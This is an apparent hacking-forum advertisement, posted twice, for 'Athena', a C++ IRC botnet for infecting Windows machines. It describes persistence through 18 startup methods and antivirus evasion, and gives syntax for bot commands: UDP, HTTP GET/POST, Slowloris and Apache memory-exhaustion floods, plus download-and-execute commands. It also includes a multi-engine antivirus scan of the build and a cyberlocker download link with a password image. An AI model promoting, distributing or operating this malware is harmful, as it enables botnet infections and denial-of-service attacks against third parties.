DooMsDay
05-20-2013, 11:51 PM
http://puu.sh/XZJT
About:
Athena is an IRC bot coded in C++ (zero dependencies) perfect for infecting Windows machines. After execution, Athena will install deep into the host computer using 18 different potential methods of startup(both registry and non-registry) depending on the environment it is in(OS and privileges). Athena utilizes several techniques to evade potential anti-viruses and botkillers, and remains very stable -- it is great for maintaining a large botnet.
This bot specializes in advanced DDoS attacks(guaranteed stronger than anything you may have witnessed on HF). They are - UDP, Rapid HTTP GET, Slow HTTP POST, Slowloris, ARME(Apache Remote Memory Exhaustion), and Rapid Connect/Disconnect flooding.
Commands/Features:
DDoS Commands
[Port 80 is most common for websites]
!udp - Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use '0' to flood random ports]
!condis - Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoiP servers like gravy(SYNTAX: !condis host/ip port time)
!httpget - Rapidly sends hundreds of HTTP GET requests every second from each bot(SYNTAX: !httpget website.com/directory/index.php port time)[a specific directory/file is optional]
!httppost - Makes hundreds of HTTP POST requests from each bot, and holds connection by slowly posting content(SYNTAX: !httppost host/ip port time)
!slowloris - Connects to a webserver through several hundred sockets per bot, and sits on it.(SYNTAX: !slowloris website.com/directory/index.php port time)[a specific directory/file is optional]
!arme - Exploits a vulnerability in Apache that crashes servers though many bulk partial headers requests at once causing a lot of memory to swap to the remote filesystem.(SYNTAX: !arme website.com/directory/index.php port time)[a specific directory/file is optional]
!httpcombo - Sends organized attacks of ARME, Slowloris, Slow HTTP POST, and Rapid HTTP GET concurrently to a specified target(SYNTAX: !httpcombo website.com port time)
Misc. Bot Commands
!id - Displays the version of the bot and who it is licensed to
!ping - Returns bot's ping time to its current connection
!openurl - Opens a webpage in the default browser(SYNTAX: !openurl http://website.com)
!openurlhidden - Opens a webpage hidden in Internet Explorer(SYNTAX: !openurlhidden http://website.com)
!urlblock - Creates a line in the computer hosts file that disallows access to a specified host(SYNTAX: !urlblock website.com)
!dlexec - Downloads and executes a file from a URL(SYNTAX: !dlexec http://website.com/program.exe)
!update - Downloads and executes a given link. The bot will uninstall after successful execution(SYNTAX: !update website.com/file.exe)
!remove - Uninstalls the bot and deletes any traces of itself
IRC Commands
!raw - Sends raw commands to the server(SYNTAX: !raw PRIVMSG #channel :message)
!silent on/off - Toggles bot output(overridden by the !raw command)
!join - Joins bot to a channel(SYNTAX: !join #channel)
!part - Parts bot from a channel(SYNTAX: !part #channel)
!newnick - Changes bot nickname using a new random number and name
!reconnect - Attempts to reconnect to the current IRC server/network and channel after disconnecting for 10 seconds
Archivo: Build.exe
TamaƱo: 96329 Bytes
MD5: 9c1ab8ef6013aba9ccadca9b6d7470f2
SHA1: e04c86b2b382695b0034ca5cf643e45f693d33d9
Resultado: 16/35
Estado: Infectado
AVG Free - May be infected by unknown virus Win32/DH{IAEJAw8}
ArcaVir - OK
Avast 5 - OK
AntiVir (Avira) - TR/Downloader.Gen
BitDefender - Generic.Sdbot.057294AD
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - DLOADER.IRC.Trojan
eTrust-Vet - OK
F-PROT Antivirus - W32/Heuristic-119!Eldorado (not disinfectable)
F-Secure Internet Security - Generic.Sdbot.057294AD
G Data - Generic.Sdbot.057294AD
IKARUS Security - OK
Kaspersky Antivirus - HEUR:Trojan.Win32.Generic
McAfee - OK
MS Security Essentials - Backdoor:Win32/Silby
ESET NOD32 - OK
Norman - W32/Backdoor
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Rising Antivirus - OK
Solo Antivirus - OK
Sophos - Mal/IRCBot-C
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Vexira Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - Trojan.Win32.Ircbot!cobra (v)
BullGuard - Generic.Sdbot.057294AD
Immunet Antivirus - Generic.Sdbot.057294AD
K7 Ultimate - Riskware ( b70d20c90 )
VIPRE - Trojan.Win32.Ircbot=21cobra (v)
http://i5.minus.com/jm8j30MOwfHZQ_e.jpg
http://i4.minus.com/jynGx0ZLWahTH_e.jpg
http://cyberlocker.ch/lzsqz4nfa54o
http://sverdos.com/images/pass.png
insanewarez
About:
Athena is an IRC bot coded in C++ (zero dependencies) perfect for infecting Windows machines. After execution, Athena will install deep into the host computer using 18 different potential methods of startup(both registry and non-registry) depending on the environment it is in(OS and privileges). Athena utilizes several techniques to evade potential anti-viruses and botkillers, and remains very stable -- it is great for maintaining a large botnet.
This bot specializes in advanced DDoS attacks(guaranteed stronger than anything you may have witnessed on HF). They are - UDP, Rapid HTTP GET, Slow HTTP POST, Slowloris, ARME(Apache Remote Memory Exhaustion), and Rapid Connect/Disconnect flooding.
Commands/Features:
DDoS Commands
[Port 80 is most common for websites]
!udp - Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use '0' to flood random ports]
!condis - Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoiP servers like gravy(SYNTAX: !condis host/ip port time)
!httpget - Rapidly sends hundreds of HTTP GET requests every second from each bot(SYNTAX: !httpget website.com/directory/index.php port time)[a specific directory/file is optional]
!httppost - Makes hundreds of HTTP POST requests from each bot, and holds connection by slowly posting content(SYNTAX: !httppost host/ip port time)
!slowloris - Connects to a webserver through several hundred sockets per bot, and sits on it.(SYNTAX: !slowloris website.com/directory/index.php port time)[a specific directory/file is optional]
!arme - Exploits a vulnerability in Apache that crashes servers though many bulk partial headers requests at once causing a lot of memory to swap to the remote filesystem.(SYNTAX: !arme website.com/directory/index.php port time)[a specific directory/file is optional]
!httpcombo - Sends organized attacks of ARME, Slowloris, Slow HTTP POST, and Rapid HTTP GET concurrently to a specified target(SYNTAX: !httpcombo website.com port time)
Misc. Bot Commands
!id - Displays the version of the bot and who it is licensed to
!ping - Returns bot's ping time to its current connection
!openurl - Opens a webpage in the default browser(SYNTAX: !openurl http://website.com)
!openurlhidden - Opens a webpage hidden in Internet Explorer(SYNTAX: !openurlhidden http://website.com)
!urlblock - Creates a line in the computer hosts file that disallows access to a specified host(SYNTAX: !urlblock website.com)
!dlexec - Downloads and executes a file from a URL(SYNTAX: !dlexec http://website.com/program.exe)
!update - Downloads and executes a given link. The bot will uninstall after successful execution(SYNTAX: !update website.com/file.exe)
!remove - Uninstalls the bot and deletes any traces of itself
IRC Commands
!raw - Sends raw commands to the server(SYNTAX: !raw PRIVMSG #channel :message)
!silent on/off - Toggles bot output(overridden by the !raw command)
!join - Joins bot to a channel(SYNTAX: !join #channel)
!part - Parts bot from a channel(SYNTAX: !part #channel)
!newnick - Changes bot nickname using a new random number and name
!reconnect - Attempts to reconnect to the current IRC server/network and channel after disconnecting for 10 seconds
Archivo: Build.exe
TamaƱo: 96329 Bytes
MD5: 9c1ab8ef6013aba9ccadca9b6d7470f2
SHA1: e04c86b2b382695b0034ca5cf643e45f693d33d9
Resultado: 16/35
Estado: Infectado
AVG Free - May be infected by unknown virus Win32/DH{IAEJAw8}
ArcaVir - OK
Avast 5 - OK
AntiVir (Avira) - TR/Downloader.Gen
BitDefender - Generic.Sdbot.057294AD
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - DLOADER.IRC.Trojan
eTrust-Vet - OK
F-PROT Antivirus - W32/Heuristic-119!Eldorado (not disinfectable)
F-Secure Internet Security - Generic.Sdbot.057294AD
G Data - Generic.Sdbot.057294AD
IKARUS Security - OK
Kaspersky Antivirus - HEUR:Trojan.Win32.Generic
McAfee - OK
MS Security Essentials - Backdoor:Win32/Silby
ESET NOD32 - OK
Norman - W32/Backdoor
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Rising Antivirus - OK
Solo Antivirus - OK
Sophos - Mal/IRCBot-C
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Vexira Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - Trojan.Win32.Ircbot!cobra (v)
BullGuard - Generic.Sdbot.057294AD
Immunet Antivirus - Generic.Sdbot.057294AD
K7 Ultimate - Riskware ( b70d20c90 )
VIPRE - Trojan.Win32.Ircbot=21cobra (v)
http://i5.minus.com/jm8j30MOwfHZQ_e.jpg
http://i4.minus.com/jynGx0ZLWahTH_e.jpg
http://cyberlocker.ch/lzsqz4nfa54o
http://sverdos.com/images/pass.png
insanewarez